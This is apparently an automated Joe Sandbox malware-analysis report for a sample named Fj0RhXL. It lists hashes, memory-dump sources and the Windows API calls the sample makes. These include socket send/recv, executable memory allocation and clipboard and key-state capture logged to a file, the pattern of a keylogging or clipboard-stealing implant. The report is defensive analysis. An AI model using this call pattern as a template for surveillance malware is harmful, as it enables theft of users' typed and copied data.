                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
                                          • String ID:
                                          • API String ID: 4224061863-0
                                          • Opcode ID: f817c1f1009f934614188406f126711d5af074cb6f9bf68a6e7cfb3210496ea4
                                          • Instruction ID: dd570616691d3250c208961882ddf71b6ee63debdd3a30f339bbad57daabf7e5
                                          • Opcode Fuzzy Hash: f817c1f1009f934614188406f126711d5af074cb6f9bf68a6e7cfb3210496ea4
                                          • Instruction Fuzzy Hash: 57C08C618002082A9B203B318C9890A7A4EE9807E0B8104107A1891081EFA0E800E850
                                          APIs
                                          • __EH_prolog3_catch_GS.LIBCMT ref: 6C354005
                                            • Part of subcall function 6C353021: _memset.LIBCMT ref: 6C35304F
                                            • Part of subcall function 6C353021: GetModuleFileNameA.KERNEL32(?,000000FF), ref: 6C353124
                                            • Part of subcall function 6C374AFA: _fgetc.LIBCMT ref: 6C374B43
                                            • Part of subcall function 6C374AFA: _sprintf.LIBCMT ref: 6C374B6F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: FileH_prolog3_catch_ModuleName_fgetc_memset_sprintf
                                          • String ID: astrolog.as
                                          • API String ID: 2788110157-2633699130
                                          • Opcode ID: 26895dcdbb299c02d7715fb58d190bac59646ed244d366dda658a8eefab56255
                                          • Instruction ID: b09f66b190429933970bdb6bacb4aa5dec63133cd84504e6dbd43bb0838ba3d0
                                          • Opcode Fuzzy Hash: 26895dcdbb299c02d7715fb58d190bac59646ed244d366dda658a8eefab56255
                                          • Instruction Fuzzy Hash: 10F03A717462908ADF68FFA69880CE8B670AB0A60D370193FD15287A84CB71C0699F96
                                          APIs
                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 03BF022B
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622789502.0000000003BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BF0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3bf0000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                          • Instruction ID: 7c1d9599afd8a32a79f0b980ec96ddd8931cb7807fe209cc26fb1b8b9d05c5d0
                                          • Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                          • Instruction Fuzzy Hash: 63A14D74A00606EFDB14DFA9C880AADF7B5FF48308F1891B9E615D7262D730EA55CB90
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: Time_memmovetime
                                          • String ID:
                                          • API String ID: 1463837790-0
                                          • Opcode ID: 1c9688e62d3bc12022b9b5cafefecbebdaa40d94c8a2101d8d7dfc87ed816473
                                          • Instruction ID: 27bb2f889f6fa3b2e9e3359ec694e7ddb4f8c8bf15d882a5665f497174f7766e
                                          • Opcode Fuzzy Hash: 1c9688e62d3bc12022b9b5cafefecbebdaa40d94c8a2101d8d7dfc87ed816473
                                          • Instruction Fuzzy Hash: 3251D576B002019FD715CF69C9C0A6BB7A5BF4439470486ACEA19CB780DB31FC51DB90
                                          APIs
                                          • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 03D83013
                                          • recv.WS2_32(?,?,00040000,00000000), ref: 03D83034
                                            • Part of subcall function 03D9ADE6: __getptd_noexit.LIBCMT ref: 03D9ADE6
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __getptd_noexitrecvselect
                                          • String ID:
                                          • API String ID: 4248608111-0
                                          • Opcode ID: 7730b106918f1b793ea48fa151fed7aa320f969ec7062de4debbef6c1cb02b84
                                          • Instruction ID: 2e441a9226b0ac0789f588c417e114f7aa11dc6363c09033f33b3a4ef32146d8
                                          • Opcode Fuzzy Hash: 7730b106918f1b793ea48fa151fed7aa320f969ec7062de4debbef6c1cb02b84
                                          • Instruction Fuzzy Hash: C021967D900308DFEB20FF64CC89B9A77A4EF05B10F144595E5495F290D7B4AD94CBA1
                                          APIs
                                          • send.WS2_32(?,?,00040000,00000000), ref: 03D83261
                                          • send.WS2_32(?,?,?,00000000), ref: 03D8329E
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: send
                                          • String ID:
                                          • API String ID: 2809346765-0
                                          • Opcode ID: 6e98804d290bafdecbef0a6d776ca3bf2e65ffacdece225b45f1e95ff652c73c
                                          • Instruction ID: 94c7972a752d1d25d64d639d705ccf046beb6962200a3196ca2b6a6f399b2527
                                          • Opcode Fuzzy Hash: 6e98804d290bafdecbef0a6d776ca3bf2e65ffacdece225b45f1e95ff652c73c
                                          • Instruction Fuzzy Hash: 8E11A57EA01304EBDB60EB6EDC84B5EB7A9FB81B64F154125F90CDB280D270BA418760
                                          APIs
                                          • send.WS2_32(?,?,00040000,00000000), ref: 02F03261
                                          • send.WS2_32(?,?,?,00000000), ref: 02F0329E
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: send
                                          • String ID:
                                          • API String ID: 2809346765-0
                                          • Opcode ID: 2f8e13efcab34719ee669471c8138ac35285f6b763d809db69902073aba266ed
                                          • Instruction ID: 38206247f0a6bfb4d592394ce230c2803811ca1bdd9d547a454a85f4ad48ee00
                                          • Opcode Fuzzy Hash: 2f8e13efcab34719ee669471c8138ac35285f6b763d809db69902073aba266ed
                                          • Instruction Fuzzy Hash: 4611E572F01244ABDB20CA2ADCC4B5EB7A9EB893A8F1141A1EB0CD71C0D270AA41A750
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: SleepTimetime
                                          • String ID:
                                          • API String ID: 346578373-0
                                          • Opcode ID: e9bbbeaa825b0a8b301071663a0408dbce67db7ffbfc0fd580f66b3bdd01b5dd
                                          • Instruction ID: f3b2f25c4998f9b8a35db3399feb3df55bc47365226a0d06b6d32347e0948974
                                          • Opcode Fuzzy Hash: e9bbbeaa825b0a8b301071663a0408dbce67db7ffbfc0fd580f66b3bdd01b5dd
                                          • Instruction Fuzzy Hash: AF01D439600209EFD314EF18C8C8BADF3A5FB55B00F184268D10887290C770BAD5C7E1
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: SleepTimetime
                                          • String ID:
                                          • API String ID: 346578373-0
                                          • Opcode ID: 6b1ce1e481a967d54c9757fa0ac3b9a9f6354afbeef0ff60f862630dc050ff47
                                          • Instruction ID: 7108c041beeb2ee953983b04570fc15fabf88f6971795a9039bf557ba953d5df
                                          • Opcode Fuzzy Hash: 6b1ce1e481a967d54c9757fa0ac3b9a9f6354afbeef0ff60f862630dc050ff47
                                          • Instruction Fuzzy Hash: 4501B131A0020AAFE310CF69C8C8BA9F3A5FB99384F544264D2048B2C0C770A995D7E1
                                          APIs
                                          • HeapCreate.KERNEL32(00000004,00000000,00000000,03D98BF9,00000000,03D944C0,?,?,00000000,03DB0C7B,000000FF,?,03D98BF9), ref: 03D979EB
                                          • _free.LIBCMT ref: 03D97A26
                                            • Part of subcall function 03D81280: __CxxThrowException@8.LIBCMT ref: 03D81290
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateException@8HeapThrow_free
                                          • String ID:
                                          • API String ID: 1065114656-0
                                          • Opcode ID: 57c04831de9a115aea088a71e8539faed43fb4fb52ee1239ccbcfe583f1895c2
                                          • Instruction ID: 3801b087cf592f587f340f76507f95aca58ce542dd0f04920fd668dd013ed289
                                          • Opcode Fuzzy Hash: 57c04831de9a115aea088a71e8539faed43fb4fb52ee1239ccbcfe583f1895c2
                                          • Instruction Fuzzy Hash: 12017AF1A00B448FD721DF2A8844A57FAE8FF99700B144A1ED2DAC6B20D375A105CB95
                                          APIs
                                          • HeapCreate.KERNEL32(00000004,00000000,00000000,02F061BF,00000000,02F05AE2), ref: 02F0652B
                                          • _free.LIBCMT ref: 02F06566
                                            • Part of subcall function 02F01280: __CxxThrowException@8.LIBCMT ref: 02F01290
                                            • Part of subcall function 02F01280: DeleteCriticalSection.KERNEL32(00000000,00000000,02F17DF8,?,?,02F06541), ref: 02F012A1
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                          • String ID:
                                          • API String ID: 1116298128-0
                                          • Opcode ID: e7f65706ad2666b55f751d4c9b7f3ceb2c9dc7ca493e49bdbde77ae69186fd26
                                          • Instruction ID: a7a5c1ab6ab5b641e900409f3f244a6835f69731ac8ea8d038ab9f5a27049411
                                          • Opcode Fuzzy Hash: e7f65706ad2666b55f751d4c9b7f3ceb2c9dc7ca493e49bdbde77ae69186fd26
                                          • Instruction Fuzzy Hash: D1017AF0A00B448FC7309F6A9884A17FAF8BF98750B504A1EE2DAC6B50D370A155DF95
                                          APIs
                                          • CreateThread.KERNEL32(00000000,00000000,03D98AA0,00000000,00000000,00000000), ref: 03D9903B
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,03D9C7BB,?,?,?,?,?,?,03DB76A8,0000000C,03D9C863,?), ref: 03D99049
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateObjectSingleThreadWait
                                          • String ID:
                                          • API String ID: 1891408510-0
                                          • Opcode ID: 947d269484a7851847ae9a97c93db37cc285974956c2bb3135a8fab1b4e9b179
                                          • Instruction ID: 576a0c745123a9460339d1db380bee76f338cac374f6404c5742da4442732f50
                                          • Opcode Fuzzy Hash: 947d269484a7851847ae9a97c93db37cc285974956c2bb3135a8fab1b4e9b179
                                          • Instruction Fuzzy Hash: 97E05BB3554306FFEF50EB64DC84D76335CD304B307104516B924D6345F638E8548620
                                          APIs
                                          • __getptd.LIBCMT ref: 03D9AE5A
                                            • Part of subcall function 03DA2A45: __getptd_noexit.LIBCMT ref: 03DA2A48
                                            • Part of subcall function 03DA2A45: __amsg_exit.LIBCMT ref: 03DA2A55
                                            • Part of subcall function 03D9AE2F: __getptd_noexit.LIBCMT ref: 03D9AE34
                                            • Part of subcall function 03D9AE2F: __freeptd.LIBCMT ref: 03D9AE3E
                                            • Part of subcall function 03D9AE2F: ExitThread.KERNEL32 ref: 03D9AE47
                                          • __XcptFilter.LIBCMT ref: 03D9AE7B
                                            • Part of subcall function 03DA2D77: __getptd_noexit.LIBCMT ref: 03DA2D7D
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                          • String ID:
                                          • API String ID: 418257734-0
                                          • Opcode ID: e8ac5abacc7f945d1dd86f4dafc0092f8a555a54ad0a62188545525c1c5ede3b
                                          • Instruction ID: 82d51056f4d2ea27a0c1cb425da514b9d96aa70a13e3ae9f596ba66a0d462ede
                                          • Opcode Fuzzy Hash: e8ac5abacc7f945d1dd86f4dafc0092f8a555a54ad0a62188545525c1c5ede3b
                                          • Instruction Fuzzy Hash: 2AE0ECB9A01B009FEB18FBA5C945E6D7775EF48701F200449E1026F2B1CB7599409B31
                                          APIs
                                          • __getptd.LIBCMT ref: 02F07291
                                            • Part of subcall function 02F099DE: __getptd_noexit.LIBCMT ref: 02F099E1
                                            • Part of subcall function 02F099DE: __amsg_exit.LIBCMT ref: 02F099EE
                                            • Part of subcall function 02F07266: __getptd_noexit.LIBCMT ref: 02F0726B
                                            • Part of subcall function 02F07266: __freeptd.LIBCMT ref: 02F07275
                                            • Part of subcall function 02F07266: ExitThread.KERNEL32 ref: 02F0727E
                                          • __XcptFilter.LIBCMT ref: 02F072B2
                                            • Part of subcall function 02F09D10: __getptd_noexit.LIBCMT ref: 02F09D16
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                          • String ID:
                                          • API String ID: 418257734-0
                                          • Opcode ID: 88252a324ec3bb2cd0ef0b6a85075b13ae89b4a503435f98ed6e522b8894210c
                                          • Instruction ID: 5656e9369dc83c9dc108465013f011d163c49072bbe36873a92e461a8358561c
                                          • Opcode Fuzzy Hash: 88252a324ec3bb2cd0ef0b6a85075b13ae89b4a503435f98ed6e522b8894210c
                                          • Instruction Fuzzy Hash: 3BE0E6719456019FE708BBE0CD85E6E7766DF44751F200049E2025B2E1DB75A940EF20
                                          APIs
                                          • __lock.LIBCMT ref: 03DA5086
                                            • Part of subcall function 03DA8DA3: __mtinitlocknum.LIBCMT ref: 03DA8DB9
                                            • Part of subcall function 03DA8DA3: __amsg_exit.LIBCMT ref: 03DA8DC5
                                            • Part of subcall function 03DA8DA3: EnterCriticalSection.KERNEL32(00000000,00000000,?,03DA2AF0,0000000D,03DB7788,00000008,03DA2BE7,00000000,?,03D9C743,00000000,03DB7688,00000008,03D9C7A8,?), ref: 03DA8DCD
                                          • __tzset_nolock.LIBCMT ref: 03DA5097
                                            • Part of subcall function 03DA498D: __lock.LIBCMT ref: 03DA49AF
                                            • Part of subcall function 03DA498D: ____lc_codepage_func.LIBCMT ref: 03DA49F6
                                            • Part of subcall function 03DA498D: __getenv_helper_nolock.LIBCMT ref: 03DA4A18
                                            • Part of subcall function 03DA498D: _free.LIBCMT ref: 03DA4A4F
                                            • Part of subcall function 03DA498D: _strlen.LIBCMT ref: 03DA4A56
                                            • Part of subcall function 03DA498D: __malloc_crt.LIBCMT ref: 03DA4A5D
                                            • Part of subcall function 03DA498D: _strlen.LIBCMT ref: 03DA4A73
                                            • Part of subcall function 03DA498D: _strcpy_s.LIBCMT ref: 03DA4A81
                                            • Part of subcall function 03DA498D: __invoke_watson.LIBCMT ref: 03DA4A96
                                            • Part of subcall function 03DA498D: _free.LIBCMT ref: 03DA4AA5
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                                          • String ID:
                                          • API String ID: 1828324828-0
                                          • Opcode ID: 17c2828a4662435a479b32d56b238d564766cb3c10a4401c2205485ca37546b1
                                          • Instruction ID: 5d718e1bb492ca5001dd9494a1576d9ab654256ccb90addfcf28b9d5b7db5e76
                                          • Opcode Fuzzy Hash: 17c2828a4662435a479b32d56b238d564766cb3c10a4401c2205485ca37546b1
                                          • Instruction Fuzzy Hash: 2CE0CD79461F13DECE35FBAD6B0011CB772FB44B11F100A55A19059684C5B00650E6F1
                                          APIs
                                          • RegCloseKey.ADVAPI32(80000001,03D8839A), ref: 03D883C9
                                          • RegCloseKey.ADVAPI32(75BF73E0), ref: 03D883D2
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 45994b81f824df9d3e21d87f51feed482e8a44122fc2a74ebdbf1daaacc7d866
                                          • Instruction ID: 71814a7bc1da5855af54a1ee965f5b1a155f1e4eb88907b6425b49afe7bcdfac
                                          • Opcode Fuzzy Hash: 45994b81f824df9d3e21d87f51feed482e8a44122fc2a74ebdbf1daaacc7d866
                                          • Instruction Fuzzy Hash: 3DC04C73D0102897CA10E6A4ED4494977B85B4C210F1144C2A104A3114D634AD418F90
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0
                                          • Opcode ID: 13a90dcbc440d4da213993f1286325492aa12719f165810e23802ef010de9e6b
                                          • Instruction ID: 6b63f5b952fe45f72eb9f173b3259a20116267195b8c9aa08362bf7c69f84576
                                          • Opcode Fuzzy Hash: 13a90dcbc440d4da213993f1286325492aa12719f165810e23802ef010de9e6b
                                          • Instruction Fuzzy Hash: 0711B2767042469FC718DF2FD8809AAB7E9EF84360B14C52AE85AC7251D631F85687A0
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6C3D7AD5,?,?,00000000,00000000,00000000,?,6C3D9117,00000001,00000214,?,6C3D7A8B), ref: 6C3E05EE
                                            • Part of subcall function 6C3D6FBC: __getptd_noexit.LIBCMT ref: 6C3D6FBC
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: AllocateHeap__getptd_noexit
                                          • String ID:
                                          • API String ID: 328603210-0
                                          • Opcode ID: 3aaf4dbf0f0e0c52a131488790f8593114411c020b2c33a89f6c668d6ee15844
                                          • Instruction ID: f2e5cb509ccad5d5acb3d1e6629f697ac23fcae92046eae5eb640f21005c064d
                                          • Opcode Fuzzy Hash: 3aaf4dbf0f0e0c52a131488790f8593114411c020b2c33a89f6c668d6ee15844
                                          • Instruction Fuzzy Hash: 7201B531305275DBEB159E25D814B573368EB85368F11462BE86ADA9C0DF75D800DF50
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: __fsopen
                                          • String ID:
                                          • API String ID: 3646066109-0
                                          • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                          • Instruction ID: 9f7d75bb4620f9ede3c61bfc6b9615d730aee0f230587228abdf798aff93f430
                                          • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                          • Instruction Fuzzy Hash: 0FC09B7354110C77CF111A42DC05E563F199BC0664F454010FF1C195609673ED659985
                                          APIs
                                          • _memset.LIBCMT ref: 03D99449
                                          • Sleep.KERNEL32(00000001,?,?,?,03D8687D), ref: 03D99453
                                          • GetTickCount.KERNEL32 ref: 03D9945F
                                          • GetTickCount.KERNEL32 ref: 03D99472
                                          • InterlockedExchange.KERNEL32(03DC4338,00000000), ref: 03D9947A
                                          • OpenClipboard.USER32(00000000), ref: 03D99482
                                          • GetClipboardData.USER32(0000000D), ref: 03D9948A
                                          • GlobalSize.KERNEL32(00000000), ref: 03D9949B
                                          • GlobalLock.KERNEL32(00000000), ref: 03D994AC
                                          • _memmove.LIBCMT ref: 03D99510
                                          • wsprintfW.USER32 ref: 03D99525
                                          • _memset.LIBCMT ref: 03D99543
                                          • GlobalUnlock.KERNEL32(00000000), ref: 03D9954C
                                          • CloseClipboard.USER32 ref: 03D99552
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03D9956A
                                          • CreateFileW.KERNEL32(03DC31A0,40000000,00000002,00000000,00000004,00000002,00000000), ref: 03D99584
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 03D995A2
                                          • lstrlenW.KERNEL32(03DB6880,?,00000000), ref: 03D995B6
                                          • WriteFile.KERNEL32(00000000,03DB6880,00000000), ref: 03D995C5
                                          • CloseHandle.KERNEL32(00000000), ref: 03D995CC
                                          • ReleaseMutex.KERNEL32(?), ref: 03D995D8
                                          • GetKeyState.USER32(00000014), ref: 03D9965C
                                          • lstrlenW.KERNEL32(03DBD7E0), ref: 03D996AB
                                          • wsprintfW.USER32 ref: 03D996BD
                                          • lstrlenW.KERNEL32(03DBD808), ref: 03D996DE
                                          • lstrlenW.KERNEL32(03DBD808), ref: 03D99701
                                          • wsprintfW.USER32 ref: 03D9971F
                                          • wsprintfW.USER32 ref: 03D99735
                                          • wsprintfW.USER32 ref: 03D9975F
                                          • lstrlenW.KERNEL32(00000000), ref: 03D997AB
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03D997C1
                                          • CreateFileW.KERNEL32(03DC31A0,40000000,00000002,00000000,00000004,00000002,00000000), ref: 03D997DB
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 03D997F9
                                          • lstrlenW.KERNEL32(00000000,?,00000000), ref: 03D99809
